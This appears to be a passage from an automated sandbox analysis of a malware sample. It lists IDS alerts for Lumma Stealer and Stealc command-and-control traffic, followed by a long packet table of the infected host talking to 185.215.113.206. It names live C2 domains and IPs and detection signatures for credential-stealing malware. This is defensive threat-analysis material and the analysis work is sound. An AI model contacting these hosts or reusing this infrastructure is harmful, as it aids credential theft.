2024-11-12T00:08:02.492919+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	60239	1.1.1.1	53	UDP
2024-11-12T00:08:02.519800+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	49173	1.1.1.1	53	UDP
2024-11-12T00:08:02.546889+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.5	59274	1.1.1.1	53	UDP
2024-11-12T00:08:02.573474+0100	2057101	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)	1	192.168.2.5	64465	1.1.1.1	53	UDP
2024-11-12T00:08:03.264404+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50324	23.197.127.21	443	TCP
2024-11-12T00:08:03.924912+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	50324	23.197.127.21	443	TCP
2024-11-12T00:08:10.552293+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50327	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 00:05:58.618391037 CET	49675	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:05:58.618393898 CET	49674	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:05:58.727698088 CET	49673	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:03.378366947 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:03.384124041 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:03.384210110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:03.384345055 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:03.389414072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.023286104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.023360014 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.031174898 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.036142111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.246195078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.246324062 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.248428106 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.253211975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.450782061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.450795889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.450848103 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.452181101 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.456976891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654154062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654179096 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654198885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654220104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654225111 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.654231071 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654242039 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654248953 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.654278040 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.654581070 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654592991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.654632092 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.656421900 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.661283016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.857980013 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.858046055 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.875118971 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.875190020 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:04.879962921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.880009890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.880019903 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.880028963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.880163908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:04.880173922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:05.584125996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:05.584230900 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:05.846750021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:05.851625919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046588898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046603918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046621084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046683073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046695948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046706915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.046710014 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.046757936 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047245979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047261953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047275066 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047287941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047302008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047333002 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047677994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047694921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047707081 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047720909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.047724009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047741890 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.047769070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.159815073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.159832954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.159845114 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.159857035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.159915924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.159970045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.159984112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.159995079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160037994 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.160212994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160224915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160237074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160260916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.160275936 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.160300970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160314083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.160343885 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.160407066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161026001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161037922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161047935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161060095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161067009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161073923 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161112070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161770105 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161782026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161792994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161817074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161834002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161840916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161847115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161859035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.161870956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.161892891 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.162700891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.162746906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.162758112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.162792921 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273040056 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273056984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273068905 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273086071 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273102999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273113966 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273139000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273204088 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273323059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273381948 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273402929 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273425102 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273442030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273488998 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273499012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273524046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273535967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273546934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273559093 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273580074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273833036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273852110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273863077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.273885012 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.273896933 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.274256945 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274269104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274307013 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.274327040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274370909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.274437904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274447918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274457932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274468899 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274480104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274488926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.274492025 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274534941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.274545908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.274581909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275192976 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275209904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275221109 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275248051 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275259972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275273085 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275388002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275437117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275495052 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275506020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275516987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275530100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275542021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275549889 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275554895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275573015 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275590897 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.275650978 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.275696039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.276321888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276369095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.276444912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276456118 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276467085 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276478052 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276488066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.276489973 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276501894 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276504040 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.276514053 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.276536942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.276547909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.277182102 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.277228117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.277230978 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.277240038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.277262926 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.277266979 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.277272940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.277285099 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.277295113 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.277316093 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.385804892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385826111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385838032 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385848045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385860920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385910988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385909081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.385921955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385937929 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385973930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.385989904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.385993958 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386039019 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386065960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386076927 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386086941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386101961 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386121988 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386126995 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386138916 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386166096 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386168957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386178970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386190891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386193037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386214972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386234999 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386478901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386490107 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386501074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386533022 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386552095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386554956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386564016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386574030 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386584997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386590004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386596918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386604071 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386622906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386646032 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.386936903 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.386989117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387015104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387032032 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387042046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387058973 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387067080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387069941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387075901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387085915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387096882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387099981 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387106895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387119055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387132883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387156010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387622118 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387633085 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387645960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387670994 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387677908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387677908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387690067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387713909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387726068 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387880087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387897015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387907982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.387926102 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.387939930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388076067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388087034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388097048 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388111115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388120890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388124943 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388133049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388143063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388147116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388154984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388155937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388165951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388178110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388184071 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388189077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388209105 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388223886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.388952971 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388964891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388974905 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388986111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.388997078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389004946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389009953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389027119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389033079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389043093 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389046907 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389054060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389070034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389071941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389081955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389092922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389097929 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389103889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389116049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389126062 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389137983 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389157057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389910936 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389928102 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389938116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389950037 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389961004 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389961958 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389967918 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.389976025 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.389996052 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390002966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.390007019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390018940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390022039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.390029907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390039921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390050888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390059948 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.390062094 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390074015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390088081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.390106916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.390768051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390779018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.390789032 CET	80	49704	185.215.113.206	192.168.2.5
